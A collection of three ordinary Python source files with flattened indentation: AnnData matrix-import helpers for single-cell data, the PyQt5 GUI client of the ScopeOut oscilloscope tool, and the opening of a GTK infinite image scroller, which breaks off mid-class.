ts = list(df_ec.transcripts)
get_transcript_ids = lambda ts, transcripts: [
[transcripts[int(i)] for i in t.split(',')] for t in ts
]
futures = []
with concurrent.futures.ThreadPoolExecutor(max_workers=threads) as executor:
chunk = int(len(ts) / threads) + 1
for i in range(threads):
future = executor.submit(
get_transcript_ids, ts[i * chunk:(i + 1) * chunk], transcripts
)
futures.append(future)
transcript_ids = []
for future in futures:
transcript_ids += future.result()
df_ec['transcript_ids'] = transcript_ids
df_ec.drop('transcripts', axis=1, inplace=True)
return anndata.AnnData(
X=scipy.io.mmread(matrix_path).tocsr(), obs=df_barcodes, var=df_ec
)
def import_matrix_as_anndata(
matrix_path, barcodes_path, genes_path, t2g_path=None, name='gene'
):
"""Import a matrix as an Anndata object.
:param matrix_path: path to the matrix ec file
:type matrix_path: str
:param barcodes_path: path to the barcodes txt file
:type barcodes_path: str
:param genes_path: path to the genes txt file
:type genes_path: str
:param t2g_path: path to transcript-to-gene mapping. If this is provided,
the third column of the mapping is appended to the
anndata var, defaults to `None`
:type t2g_path: str, optional
:param name: name of the columns, defaults to "gene"
:type name: str, optional
:return: a new Anndata object
:rtype: anndata.Anndata
"""
df_barcodes = pd.read_csv(
barcodes_path, index_col=0, header=None, names=['barcode']
)
df_genes = pd.read_csv(
genes_path, header=None, index_col=0, names=[f'{name}_id'], sep='\t'
)
df_genes.index = df_genes.index.astype(
str
) # To prevent logging from anndata
mtx = scipy.io.mmread(matrix_path)
# If any of the genes are duplicated, collapse them by summing
if any(df_genes.index.duplicated()):
logger.debug(
f'Deduplicating genes found in {genes_path} by adding duplicates'
)
mtx = mtx.tocsc()
gene_indices = {}
for i, gene in enumerate(df_genes.index):
gene_indices.setdefault(gene, []).append(i)
genes = []
deduplicated_mtx = sparse.lil_matrix(
(len(df_barcodes), len(gene_indices))
)
for i, gene in enumerate(sorted(gene_indices.keys())):
genes.append(gene)
indices = gene_indices[gene]
deduplicated_mtx[:, i] = mtx[:, indices].sum(axis=1)
df_genes = pd.DataFrame(index=pd.Series(genes, name=f'{name}_id'))
mtx = deduplicated_mtx
t2g = read_t2g(t2g_path) if t2g_path else {}
id_to_name = {}
for transcript, attributes in t2g.items():
if len(attributes) > 1:
id_to_name[attributes[0]] = attributes[1]
gene_names = [id_to_name.get(i, '') for i in df_genes.index]
if any(bool(g) for g in gene_names):
df_genes[f'{name}_name'] = gene_names
return anndata.AnnData(X=mtx.tocsr(), obs=df_barcodes, var=df_genes)
def overlay_anndatas(adata_spliced, adata_unspliced):
"""'Overlays' anndata objects by taking the intersection of the obs and var
of each anndata.
:param adata_spliced: an Anndata object
:type adata_spliced: anndata.Anndata
:param adata_unspliced: an Anndata object
:type adata_unspliced: anndata.Anndata
:return: a new Anndata object
:rtype: anndata.Anndata
"""
obs_idx = adata_spliced.obs.index.intersection(adata_unspliced.obs.index)
var_idx = adata_spliced.var.index.intersection(adata_unspliced.var.index)
spliced_intersection = adata_spliced[obs_idx][:, var_idx]
unspliced_intersection = adata_unspliced[obs_idx][:, var_idx]
df_obs = unspliced_intersection.obs
df_var = unspliced_intersection.var
return anndata.AnnData(
X=spliced_intersection.X,
layers={
'spliced': spliced_intersection.X,
'unspliced': unspliced_intersection.X
},
obs=df_obs,
var=df_var
)
def sum_anndatas(adata_spliced, adata_unspliced):
"""Sum the counts in two anndata objects by taking the intersection of
both matrices and adding the values together.
:param adata_spliced: an Anndata object
:type adata_spliced: anndata.Anndata
:param adata_unspliced: an Anndata object
:type adata_unspliced: anndata.Anndata
:return: a new Anndata object
:rtype: anndata.Anndata
"""
obs_idx = adata_spliced.obs.index.intersection(adata_unspliced.obs.index)
var_idx = adata_spliced.var.index.intersection(adata_unspliced.var.index)
spliced_intersection = adata_spliced[obs_idx][:, var_idx]
unspliced_intersection = adata_unspliced[obs_idx][:, var_idx]
df_obs = unspliced_intersection.obs
df_var = unspliced_intersection.var
return anndata.AnnData(
X=spliced_intersection.X + unspliced_intersection.X,
obs=df_obs,
var=df_var
)
|
client.py | """
ScopeOut GUI
Defines GUI client that instantiates and controls widgets and threads.
"""
# Set matplotlib to call PyQt5
from matplotlib import rcParams
rcParams['backend'] = 'Qt5Agg'
import threading
import os
import logging
from datetime import date, datetime
from functools import partial
from PyQt5 import QtWidgets, QtCore
from scopeout.utilities import ScopeFinder
from scopeout.models import *
from scopeout.config import ScopeOutConfig as Config
from scopeout.database import ScopeOutDatabase as Database
from scopeout.filesystem import WaveformCsvFile
import scopeout.widgets as sw
class ThreadedClient(QtWidgets.QApplication):
"""
Launches the GUI and handles I/O.
GUI components reside within the body of the class itself. This client acquires and manipulates
data from attached scopes and feeds it to the GUI. Various threads are created to carry out
USB communication asynchronously.
NOTES:
Initially, the client is not connected to any scopes, and searches for them continuously.
This occurs in the scopeFind thread. when a scope is found, this thread returns, and
periodic scope checking begins in the scopeCheck thread. A loss of connection should disable
the interface and initiate scopeFind again.
Creation of the widgets that make up the actual interface is done in the constructor of this
class. All Qt Signals that facilitate the interaction of the client with these widgets are
connected in the connect_signals method.
"""
lock = threading.Lock() # Lock for scope resource
stop_flag = threading.Event() # Event representing termination of program
acquisition_stop_flag = threading.Event() # Event representing termination of continuous acquisition
channel_set_flag = threading.Event() # Set when data channel has been successfully changed.
wave_acquired_flag = threading.Event() # Set during continuous acquisition when a waveform has been acquired.
continuous_flag = threading.Event() # Set while program is finding scopes continuously
continuous_flag.set()
status_change_signal = QtCore.pyqtSignal(str) # Signal sent to GUI waveform counter.
scope_change_signal = QtCore.pyqtSignal(object) # Signal sent to change the active oscilloscope.
new_wave_signal = QtCore.pyqtSignal(Waveform)
wave_added_to_db_signal = QtCore.pyqtSignal(Waveform)
def __init__(self, *args):
"""
Constructor
"""
QtWidgets.QApplication.__init__(self, *args)
# create logger
self.logger = logging.getLogger('ScopeOut.gui.ThreadedClient')
self.logger.info("Threaded Client initialized")
# save a reference to the app database.
# all access to the database must occur in this thread.
self.database = None
self.db_session = None
# start in single-channel acquisition mode by default.
self.multi_channel_acquisition = False
# Create widgets.
self.acquisition_control = sw.AcquisitionControlWidget(None)
self.plot = sw.WavePlotWidget()
self.histogram = sw.HistogramPlotWidget()
self.wave_options = sw.WaveOptionsTabWidget()
self.wave_column = sw.WaveColumnWidget()
self.histogram_options = sw.HistogramOptionsWidget()
self.logger.info("All Widgets initialized")
widgets = {
'column': self.wave_column,
'plot': self.plot,
'acqControl': self.acquisition_control,
'wave_options': self.wave_options,
'hist_options': self.histogram_options,
'hist': self.histogram
}
commands = {'end': self.close_event}
# Create main window that holds widgets.
self.main_window = sw.ScopeOutMainWindow(widgets, commands)
# Connect the various signals that shuttle data between widgets/threads.
self.connect_signals()
# Show the GUI
self.main_window.show()
# Oscilloscope and scope finder
self.scopes = []
self.active_scope = None
self.scope_finder = ScopeFinder()
# Thread timers
self.check_scope_timer = threading.Timer(5.0, self.check_scope)
self.find_scope_timer = threading.Timer(0.1, self.find_scope)
self.find_scope_timer.start()
# noinspection PyUnresolvedReferences
def connect_signals(self):
"""
Connects signals from subwidgets to appropriate slots.
"""
# Client Signals
self.status_change_signal.connect(self.main_window.status)
self.scope_change_signal.connect(self.acquisition_control.set_active_oscilloscope)
self.new_wave_signal.connect(self.plot_wave)
self.new_wave_signal.connect(self.save_wave_to_db)
self.new_wave_signal.connect(self.update_histogram)
self.new_wave_signal.connect(self.histogram_options.update_properties)
self.wave_added_to_db_signal.connect(self.wave_column.add_wave)
# Acq Control Signals
self.acquisition_control.acquire_button.clicked.connect(partial(self.acq_event, 'now'))
self.acquisition_control.acquire_on_trigger_button.clicked.connect(partial(self.acq_event, 'trig'))
self.acquisition_control.continuous_acquire_button.clicked.connect(partial(self.acq_event, 'cont'))
self.acquisition_control.channel_combobox.currentIndexChanged.connect(self.set_channel)
self.acquisition_control.autoset_button.clicked.connect(self.autoset_event)
self.acquisition_control.stop_acquisition_button.clicked.connect(self.acquisition_stop_flag.set)
self.acquisition_control.hold_plot_checkbox.toggled.connect(self.wave_column.set_plot_hold)
# Main window Signals
self.main_window.reset_action.triggered.connect(self.reset)
self.main_window.reset_action.triggered.connect(self.wave_column.reset)
self.main_window.save_action.triggered.connect(self.save_wave_to_disk)
self.main_window.save_properties_action.triggered.connect(self.save_properties_to_disk)
self.main_window.save_plot_action.triggered.connect(self.save_plot_to_disk)
self.main_window.save_histogram_action.triggered.connect(self.save_histogram_to_disk)
self.main_window.load_session_action.triggered.connect(self.load_database)
self.main_window.save_settings_action.triggered.connect(self.save_configuration)
self.main_window.show_plot_action.toggled.connect(self.plot.setEnabled)
self.main_window.show_histogram_action.toggled.connect(self.histogram.setEnabled)
# Wave Column Signals
self.wave_column.wave_signal.connect(self.plot_wave)
self.wave_column.save_signal.connect(self.save_wave_to_disk)
self.wave_column.save_properties_signal.connect(self.save_properties_to_disk)
self.wave_column.delete_signal.connect(self.delete_wave)
self.wave_column.delete_signal.connect(self.update_histogram)
# Plot signals
self.plot.save_plot_action.triggered.connect(self.save_plot_to_disk)
# Histogram signals
self.histogram.save_histogram_action.triggered.connect(self.save_histogram_to_disk)
# Histogram Options signals
self.histogram_options.property_selector.currentIndexChanged.connect(self.update_histogram)
self.histogram_options.bin_number_selector.valueChanged.connect(self.update_histogram)
self.logger.info("Signals connected")
def save_wave_to_db(self, wave):
"""
Save a wave and its data in the database.
:param wave: a Waveform, with its data contained in the x_list and y_list attributes.
:return:
"""
self.db_session.add(wave)
try:
self.db_session.commit()
self.logger.info("Saved waveform #" + str(wave.id) + " to the database")
self.wave_added_to_db_signal.emit(wave)
data = zip(wave.x_list, wave.y_list)
self.database.bulk_insert_data_points(data, wave.id)
except Exception as e:
self.logger.error(e)
self.db_session.rollback()
def plot_wave(self, wave):
"""
Send a wave to the plotting widget.
:param self:
:param wave: a Waveform, with its data contained in the x_list and y_list attributes.
"""
if self.plot.isEnabled():
self.plot.show_plot(wave, self.acquisition_control.plot_held, self.acquisition_control.show_peak_window)
def update_histogram(self):
"""
Update the histogram widget if the app is in histogram mode.
"""
if self.histogram.isEnabled():
wave_property = self.histogram_options.property_selector.currentText().lower().replace(' ', '_')
if wave_property:
histogram_list = [val for (val,) in self.db_session.query(getattr(Waveform, wave_property)).all()]
self.histogram.show_histogram(histogram_list, self.histogram_options.bin_number_selector.value())
self.histogram.histogram.set_title(wave_property)
def acq_event(self, mode):
"""
Executed to collect waveform data from scope.
Parameters:
:mode: A string defining the mode of acquisition: {'now' | 'trig' | 'cont'}
"""
def process_wave(wave):
"""
Extract wave and data from tuple generated by oscilloscope.
Run desired calculations on acquired wave and display plots.
Parameters:
:wave_tuple: a tuple containing a Waveform, a list of x values, and a list of y values.
"""
try:
assert type(wave) is Waveform
if wave.error is not None:
self.logger.error("Wave error: %s", wave.error)
self.update_status(wave.error)
return
wave.detect_peak_and_integrate(
self.wave_options.peak_detection_mode, self.wave_options.peak_detection_parameters)
self.logger.info("Successfully acquired waveform from %s", wave.data_channel)
self.update_status('Waveform acquired on ' + wave.data_channel)
except Exception as e:
self.update_status('Error occurred during wave processing. Check log for details.')
self.logger.error(e)
finally:
self.new_wave_signal.emit(wave)
def immediate_acquisition_thread():
"""
Contains instructions for acquiring and storing waveforms ASAP.
self.multiAcq serves as the flag to initiate multi-channel acquisition.
"""
self.channel_set_flag.clear()
if self.active_scope is not None:
self.update_status('Acquiring data...')
if not self.multi_channel_acquisition:
self.logger.info("Single channel acquisition")
try:
self.lock.acquire()
self.active_scope.make_waveform()
wave = self.active_scope.next_waveform
except Exception as e:
self.logger.error(e)
wave = None
finally:
if self.lock.locked():
self.lock.release()
if wave is not None and (not self.stop_flag.isSet()):
process_wave(wave)
else:
self.update_status('Error on Waveform Acquisition')
else:
self.logger.info("Multichannel acquisition")
self.plot.plot.reset_plot()
for i in range(0, self.active_scope.numChannels):
try:
self.logger.info("Acquiring data from channel %d", i + 1)
self.set_channel(i)
self.channel_set_flag.wait()
self.lock.acquire()
self.active_scope.make_waveform()
self.lock.release()
wave = self.active_scope.next_waveform
except Exception as e:
self.logger.error(e)
wave = None
finally:
if self.lock.locked():
self.lock.release()
if wave is not None and (not self.stop_flag.isSet()):
process_wave(wave)
else:
self.update_status('Error on Waveform Acquisition')
self.update_status('Acquired all active channels.')
self.multi_channel_acquisition = True
self.main_window.update()
enable_buttons(True)
def acquire_on_trig_thread():
"""
Waits for the scope to trigger, then acquires and stores waveforms in the same way as immAcq.
"""
self.lock.acquire()
trigger_state = self.active_scope.getTriggerStatus()
while trigger_state != 'TRIGGER' and not self.stop_flag.isSet() and not self.acquisition_stop_flag.isSet():
trigger_state = self.active_scope.getTriggerStatus()
if not self.stop_flag.isSet() and not self.acquisition_stop_flag.isSet():
try:
self.active_scope.make_waveform()
wave = self.active_scope.next_waveform
except AttributeError:
wave = None
finally:
self.wave_acquired_flag.set()
if self.lock.locked():
self.lock.release()
if not self.stop_flag.isSet() and not self.acquisition_stop_flag.isSet():
if wave is not None:
process_wave(wave)
elif self.acquisition_stop_flag.isSet():
self.update_status('Acquisition terminated')
self.logger.info('Acquisition on trigger terminated.')
if mode == 'trig':
self.acquisition_stop_flag.clear()
self.wave_acquired_flag.set() # have to set this for continuous acq to halt properly
if self.lock.locked():
self.lock.release()
else:
self.update_status('Error on Waveform Acquisition')
self.logger.info('Error on Waveform Acquisition.')
if mode == 'trig':
enable_buttons(True)
def continuous_acquisition_thread():
"""
Continually runs trigAcqThread until the stop signal is received.
"""
while not self.stop_flag.isSet() and not self.acquisition_stop_flag.isSet():
self.wave_acquired_flag.wait()
if not self.acquisition_stop_flag.isSet():
acqThread = threading.Thread(target=acquire_on_trig_thread)
acqThread.start()
self.wave_acquired_flag.clear()
self.acquisition_stop_flag.clear()
self.update_status("Continuous Acquisiton Halted.")
enable_buttons(True)
self.check_scope_timer = threading.Timer(5.0, self.check_scope)
self.check_scope_timer.start()
def enable_buttons(bool):
"""
Disables/enables buttons that should not be active during acquisition.
Parameters:
:bool: True to enable buttons, false to disable.
"""
self.acquisition_control.enable_buttons(bool)
self.acquisition_stop_flag.clear()
if not self.database:
self.database = Database()
self.db_session = self.database.session()
if mode == 'now': # Single, Immediate acquisition
enable_buttons(False)
self.logger.info("Immediate acquisition Event")
acquisition_thread = threading.Thread(target=immediate_acquisition_thread)
acquisition_thread.start()
elif mode == 'trig': # Acquire on trigger
enable_buttons(False)
self.update_status("Waiting for trigger...")
self.logger.info("Acquisition on trigger event")
acquisition_thread = threading.Thread(target=acquire_on_trig_thread)
acquisition_thread.start()
elif mode == 'cont': # Continuous Acquisition
enable_buttons(False)
self.check_scope_timer.cancel()
self.logger.info('Continuous Acquisition Event')
self.update_status("Acquiring Continuously...")
self.wave_acquired_flag.set()
acquisition_thread = threading.Thread(target=continuous_acquisition_thread)
acquisition_thread.start()
def find_scope(self):
"""
Continually checks for connected scopes, until one is found, then begins periodic checking.
"""
if not self.stop_flag.is_set():
self.scopes = self.scope_finder.refresh().get_scopes()
while not self.scopes: # Check for scopes and connect if possible
if self.stop_flag.isSet():
self.scopes = []
break
self.lock.acquire()
self.scopes = self.scope_finder.refresh().get_scopes()
self.lock.release()
if not self.stop_flag.isSet(): # Scope Found!
self.active_scope = self.scopes[0]
self.logger.info("Set active scope to %s", str(self.active_scope))
self.scope_change_signal.emit(self.active_scope)
self.update_status('Found ' + str(self.active_scope))
self.main_window.setEnabled(True)
self.check_scope_timer = threading.Timer(5.0, self.check_scope)
self.check_scope_timer.start()
def check_scope(self):
"""
Periodically confirms that scopes are still connected.
"""
if not self.stop_flag.isSet():
self.lock.acquire()
connected = self.scope_finder.check_scope(0)
if self.lock.locked():
self.lock.release()
if not connected:
self.scopes = []
self.logger.info("Lost Connection to Oscilloscope(s)")
self.update_status("Lost Connection to Oscilloscope(s)")
self.main_window.setEnabled(False)
self.check_scope_timer.cancel()
self.find_scope_timer = threading.Timer(0.1, self.find_scope)
self.find_scope_timer.start()
elif not self.stop_flag.isSet():
self.check_scope_timer = threading.Timer(5.0, self.check_scope)
self.check_scope_timer.start()
def close_event(self):
"""
Executed on app close.
"""
self.logger.info('Closing ScopeOut. \n')
self.stop_flag.set()
self.continuous_flag.clear()
self.check_scope_timer.cancel()
self.quit()
def reset(self):
"""
Called to reset waveform and plot.
"""
if self.plot.isEnabled():
self.plot.plot.reset_plot()
if self.histogram.isEnabled():
self.histogram.reset()
self.wave_column.reset()
self.histogram_options.reset()
self.update_status('Data Reset.')
self.db_session = None
self.database = None
def set_channel(self, channel):
"""
Set data channel of active scope.
Parameters:
:channel: desired data channel
"""
channels = self.acquisition_control.data_channels
def channel_thread():
try:
self.lock.acquire()
if self.acquisition_control.scope.setDataChannel(channels[channel]):
self.logger.info('Successfully set data channel %s', channels[channel])
self.update_status('Data channel set to ' + channels[channel])
else:
self.logger.debug('Failed to set data channel set to ' + channels[channel])
self.update_status('Failed to set data channel ' + channels[channel])
except Exception as e:
self.logger.error(e)
finally:
try:
self.channel_set_flag.set()
if self.lock.locked():
self.lock.release()
except Exception as e:
self.logger.error(e)
self.channel_set_flag.clear()
self.logger.info('Attempting to set data channel %s', channels[channel])
self.acquisition_control.continuous_acquire_button.setEnabled(True)
self.acquisition_control.acquire_on_trigger_button.setEnabled(True)
if channel in range(0, self.acquisition_control.scope.numChannels):
self.multi_channel_acquisition = False
set_channel_thread = threading.Thread(target=channel_thread)
set_channel_thread.start()
elif channels[channel] == 'All':
self.logger.info("Selected all data channels")
self.update_status("Selected all data channels")
self.multi_channel_acquisition = True
elif channels[channel] == 'Math':
self.logger.info("selected Math data channel")
self.update_status("selected Math data channel")
self.multi_channel_acquisition = False
set_channel_thread = threading.Thread(target=channel_thread)
set_channel_thread.start()
# No triggering in math mode
self.acquisition_control.continuous_acquire_button.setEnabled(False)
self.acquisition_control.acquire_on_trigger_button.setEnabled(False)
self.acquisition_control.stop_acquisition_button.setEnabled(False)
def save_wave_to_disk(self, waveform=None):
"""
Called in order to save in-memory waveforms to disk.
Parameters:
:wave: a particular wave to save, if none is passed then all waves in memory are saved.
"""
if waveform:
try:
wave_directory = Config.get('Export', 'waveform_dir')
if not os.path.exists(wave_directory):
os.makedirs(wave_directory)
day_directory = os.path.join(wave_directory, date.today().isoformat())
if not os.path.exists(day_directory):
os.makedirs(day_directory)
default_file = 'Capture' + datetime.now().strftime('%m-%d-%H-%M-%S') + '.csv'
default_file = os.path.join(day_directory, default_file).replace('\\', '/')
file_name = QtWidgets.QFileDialog.getSaveFileName(self.main_window, 'Save As', default_file)[0]
with WaveformCsvFile(waveform, file_name) as file:
file.write()
self.logger.info('Waveform saved to ' + file_name)
self.update_status('Waveform saved to ' + file_name)
except Exception as e:
self.logger.error(e)
else:
wave_count = self.db_session.query(Waveform).count()
if wave_count:
try:
wave_directory = Config.get('Export', 'waveform_dir')
if not os.path.exists(wave_directory):
os.makedirs(wave_directory)
day_directory = os.path.join(wave_directory, date.today().isoformat())
if not os.path.exists(day_directory):
os.makedirs(day_directory)
default_file = 'Capture' + datetime.now().strftime('%m-%d-%H-%M-%S') + '.csv'
default_file = os.path.join(day_directory, default_file).replace('\\', '/')
file_name = QtWidgets.QFileDialog.getSaveFileName(self.main_window, 'Save As', default_file)[0]
with WaveformCsvFile(self.db_session.query(Waveform), file_name) as file:
file.write()
self.logger.info("%d waveforms saved to %s", wave_count, file_name)
self.update_status('Waveforms saved to ' + file_name)
except Exception as e:
self.logger.error(e)
else:
self.update_status('No Waveforms to Save')
def save_properties_to_disk(self, waveform=None):
"""
Save the values of any number of a waveform's properties to disk.
Parameters:
:waveform: a Waveform, the properties of which are to be saved.
If none is present, the properties of all waveforms in memory are saved.
"""
def make_properties_file():
wave_directory = Config.get('Export', 'waveform_dir')
if not os.path.exists(wave_directory):
os.makedirs(wave_directory)
day_directory = os.path.join(wave_directory, date.today().isoformat())
if not os.path.exists(day_directory):
os.makedirs(day_directory)
default_file = 'Properties' + datetime.now().strftime('%m-%d-%H-%M-%S') + '.csv'
default_file = os.path.join(day_directory, default_file).replace('\\', '/')
file_name = QtWidgets.QFileDialog.getSaveFileName(self.main_window, 'Save As', default_file)[0]
return file_name
def write_properties(file_name, waves, fields):
"""
Writes the selected properties of a list of Waveforms to a .csv file.
Parameters:
:file_name: the path to the output file.
:waves: the list of Waveforms to be processed.
:fields: an array containing the names of the selected properties.
"""
try:
with WaveformCsvFile(waves, file_name) as file:
file.write_properties(fields)
self.logger.info('Waveform properties saved to ' + file_name)
self.update_status('Waveform properties saved to ' + file_name)
except Exception as e:
self.logger.error(e)
if waveform:
properties_dialog = sw.SelectPropertiesDialog(waveform)
properties_dialog.property_signal.connect(partial(write_properties, make_properties_file(), [waveform]))
properties_dialog.exec()
else:
if self.db_session:
wave_list = self.db_session.query(Waveform).all()
properties_dialog = sw.SelectPropertiesDialog(wave_list[0])
properties_dialog.property_signal.connect(partial(write_properties, make_properties_file(), wave_list))
properties_dialog.exec()
else:
self.update_status('No waveforms to save.')
def save_plot_to_disk(self):
"""
Save the currently displayed plot to disk.
"""
plot_directory = Config.get('Export', 'plot_dir')
if not os.path.exists(plot_directory):
os.makedirs(plot_directory)
day_directory = os.path.join(plot_directory, date.today().isoformat())
if not os.path.exists(day_directory):
os.makedirs(day_directory)
default_file = 'Plot' + datetime.now().strftime('%m-%d-%H-%M-%S') + '.png'
default_file = os.path.join(day_directory, default_file).replace('\\', '/')
file_name = QtWidgets.QFileDialog.getSaveFileName(self.main_window, 'Save As', default_file)[0]
if self.plot.save_plot(file_name):
self.update_status("Plot saved successfully")
else:
self.update_status("Error occurred while saving plot. Check log for details.")
def save_histogram_to_disk(self):
"""
Save an image of the active histogram.
:return:
"""
plot_directory = Config.get('Export', 'plot_dir')
if not os.path.exists(plot_directory):
os.makedirs(plot_directory)
day_directory = os.path.join(plot_directory, date.today().isoformat())
if not os.path.exists(day_directory):
os.makedirs(day_directory)
default_file = 'Histogram' + datetime.now().strftime('%m-%d-%H-%M-%S') + '.png'
default_file = os.path.join(day_directory, default_file).replace('\\', '/')
file_name = QtWidgets.QFileDialog.getSaveFileName(self.main_window, 'Save As', default_file)[0]
if self.histogram.save_plot(file_name):
self.update_status("Plot saved successfully")
else:
self.update_status("Error occurred while saving plot. Check log for details.")
def update_status(self, message):
"""
Print a message to the statusbar.
Parameters:
:message: The string to be printed.
"""
self.status_change_signal.emit(message)
def autoset_event(self):
"""
Called when a scope autoset is requested.
"""
def do_autoset():
"""
Thread to execute the autoset.
"""
self.lock.acquire()
self.acquisition_control.scope.autoSet()
self.lock.release()
self.logger.info("Starting autoSet")
self.update_status("Executing Auto-set. Ensure process is complete before continuing.")
threading.Thread(target=do_autoset, name='AutoSetThread').start()
def delete_wave(self, wave):
"""
Removes the given waveform from the database.
:param wave: the waveform to delete.
"""
try:
self.db_session.delete(wave)
self.db_session.commit()
except Exception as e:
self.logger.error(e)
self.db_session.rollback()
def load_database(self):
"""
Connect to an old database file, and load its waves into memory if it is valid.
"""
try:
default_file = Config.get('Database', 'database_dir')
database_path = QtWidgets.QFileDialog.getOpenFileName(self.main_window, 'Open', default_file)[0]
# Occurs if user hits cancel
if database_path is '':
return
self.update_status('Loading waves from ' + database_path)
self.logger.info('Disconnecting from database')
# clear old session
if self.db_session:
self.db_session.close()
self.db_session = None
# reset GUI
self.reset()
self.update_status('Loading waves from ' + database_path)
self.logger.info('Loading waves from ' + database_path)
# make new connection
self.database = Database(database_path)
if self.database.is_setup:
self.db_session = self.database.session()
# get waves
loaded_waves = self.db_session.query(Waveform).all()
if not len(loaded_waves):
raise RuntimeError('Database contained no waves.')
# display waves to user.
[self.wave_column.add_wave(wave) for wave in loaded_waves]
try:
self.plot_wave(loaded_waves[-1])
except ValueError as e:
self.logger.info(e)
except Exception as e:
self.logger.error(e)
self.histogram_options.update_properties(loaded_waves[-1])
self.update_histogram()
self.update_status('Wave loading complete.')
except Exception as e:
self.logger.error(e)
self.update_status('Failed to load waves from ' + database_path)
def save_configuration(self):
"""
Save the current settings to the configuration file.
:return:
"""
self.logger.info('Saving configuration')
settings = [('Peak Detection', 'detection_method',
self.wave_options.peak_detection_mode),
('Peak Detection', 'smart_start_threshold',
self.wave_options.smart.start_threshold_input.value()),
('Peak Detection', 'smart_end_threshold',
self.wave_options.smart.end_threshold_input.value()),
('Peak Detection', 'fixed_start_time',
self.wave_options.fixed.start_time_input.value()),
('Peak Detection', 'fixed_start_unit',
self.wave_options.fixed.start_time_unit_combobox.currentText()),
('Peak Detection', 'fixed_width_time',
self.wave_options.fixed.peak_width_input.value()),
('Peak Detection', 'fixed_width_unit',
self.wave_options.fixed.peak_width_unit_combobox.currentText()),
('Peak Detection', 'hybrid_start_threshold',
self.wave_options.hybrid.start_threshold_input.value()),
('Peak Detection', 'hybrid_width_time',
self.wave_options.hybrid.peak_width_input.value()),
('Peak Detection', 'hybrid_width_unit',
self.wave_options.hybrid.peak_width_units.currentText()),
('Peak Detection', 'voltage_threshold_start_edge',
self.wave_options.voltage_threshold.start_above_below_combobox.currentText()),
('Peak Detection', 'voltage_threshold_start_value',
self.wave_options.voltage_threshold.start_voltage_spinbox.value()),
('Peak Detection', 'voltage_threshold_start_unit',
self.wave_options.voltage_threshold.start_voltage_unit_combobox.currentText()),
('Peak Detection', 'voltage_threshold_end_edge',
self.wave_options.voltage_threshold.end_above_below_combobox.currentText()),
('Peak Detection', 'voltage_threshold_end_value',
self.wave_options.voltage_threshold.end_voltage_spinbox.value()),
('Peak Detection', 'voltage_threshold_end_unit',
self.wave_options.voltage_threshold.end_voltage_unit_combobox.currentText()),
('Histogram', 'default_property',
self.histogram_options.property_selector.currentText().lower().replace(' ', '_')),
('Histogram', 'number_of_bins',
self.histogram_options.bin_number_selector.value()),
('Acquisition Control', 'hold_plot',
self.acquisition_control.plot_held),
('Acquisition Control', 'show_peak',
self.acquisition_control.show_peak_window),
('Acquisition Control', 'data_channel',
self.acquisition_control.channel_combobox.currentText()),
('View', 'show_plot',
self.main_window.show_plot_action.isChecked()),
('View', 'show_histogram',
self.main_window.save_histogram_action.isChecked())]
Config.set_multiple(settings)
self.update_status('Configuration saved.')
|
infinite-image-scroller.py | #!/usr/bin/env python3
import itertools as it, operator as op, functools as ft
import pathlib as pl, collections as cs, dataclasses as dc
import os, sys, re, logging, enum, textwrap, random, signal
import gi
gi.require_version('Gtk', '3.0')
gi.require_version('Gdk', '3.0')
gi.require_version('GLib', '2.0')
gi.require_version('GdkPixbuf', '2.0')
from gi.repository import Gtk, Gdk, GdkPixbuf, GLib
class LogMessage:
def __init__(self, fmt, a, k): self.fmt, self.a, self.k = fmt, a, k
def __str__(self): return self.fmt.format(*self.a, **self.k) if self.a or self.k else self.fmt
class LogStyleAdapter(logging.LoggerAdapter):
def __init__(self, logger, extra=None):
super().__init__(logger, extra or {})
def log(self, level, msg, *args, **kws):
if not self.isEnabledFor(level): return
log_kws = {} if 'exc_info' not in kws else dict(exc_info=kws.pop('exc_info'))
msg, kws = self.process(msg, kws)
self.logger.log(level, LogMessage(msg, args, kws), **log_kws)
get_logger = lambda name: LogStyleAdapter(logging.getLogger(name))
dedent = lambda text: textwrap.dedent(text).strip('\n') + '\n'
@dc.dataclass
class Pos:
x: int = 0
y: int = 0
w: int = 0
h: int = 0
@dc.dataclass
class Image:
path: str
gtk: Gtk.Image
pb_src: GdkPixbuf.Pixbuf = None # source-size pixbuf, only used with sync loading
pb_proc: GdkPixbuf.Pixbuf = None # only used with helper module
sz: int = None
sz_chk: int = None
displayed: bool = False
scrolled: bool = False
class ScrollDirection(enum.IntEnum):
left = 0; right = 1; up = 2; down = 3
ScrollAdjust = enum.Enum('ScrollAdjust', 'slower faster toggle')
class ScrollerConf:
misc_app_id = 'net.fraggod.infinite-image-scroller'
misc_no_session = False
misc_box_spacing = 3
misc_event_delay = 0.2 # debounce delay for scrolling and window resizing
win_title = 'infinite-image-scroller'
win_role = 'scroller-main'
win_icon = ''
win_pos = ''
win_w = win_h = 0
win_x = win_y = 0
win_hints = win_type_hints = ''
_win_size_default = 700, 500
_win_css = dedent('''
@binding-set image-scroller-keys {
bind "Up" { "scroll-child" (step-up, 0) };
bind "Down" { "scroll-child" (step-down, 0) };
bind "Left" { "scroll-child" (step-left, 1) };
bind "Right" { "scroll-child" (step-right, 1) };
bind "w" { "scroll-child" (step-up, 0) };
bind "s" { "scroll-child" (step-down, 0) };
bind "a" { "scroll-child" (step-left, 1) };
bind "d" { "scroll-child" (step-right, 1) }; }
#infinite-image-scroller scrolledwindow { -gtk-key-bindings: image-scroller-keys; }
#infinite-image-scroller, #infinite-image-scroller * { background: transparent; }''')
_win_hints_all = (
' focus_on_map modal resizable hide_titlebar_when_maximized'
' stick maximize fullscreen keep_above keep_below decorated'
' deletable skip_taskbar skip_pager urgency accept_focus'
' auto_startup_notification mnemonics_visible focus_visible' ).split()
_win_type_hints_all = dict(
(e.value_nick, v) for v, e in Gdk.WindowTypeHint.__enum_values__.items() if v )
scroll_direction = 'down'
scroll_auto = '' # (px, interval)
scroll_adjust_k = 2
scroll_queue_size = 10
scroll_queue_preload_at = 0.6
_scroll_auto_key_start = 1, 0.01
image_proc_threads = 0
image_opacity = 1.0
image_brightness = 1.0
image_scale_algo = 'bilinear'
image_open_attempts = 3
_image_proc_module = None
# Key combos format is lowercase "[mod1 ...] key, ...", with modifier keys alpha-sorted
# Use --debug option to see which exact key-sums get pressed
keys_quit = 'q, control q, control w, escape'
keys_scroll_faster = 'm'
keys_scroll_slower = 'n'
keys_scroll_toggle = 'p, space'
_conf_sections = 'misc', 'win', 'wm', 'scroll', 'image', 'keys'
_conf_file_name = 'infinite-image-scroller.ini'
def __init__(self, **kws):
for k, v in kws.items():
if not hasattr(self, k): raise AttributeError(k)
setattr(self, k, v)
def update_from_files(self, *paths):
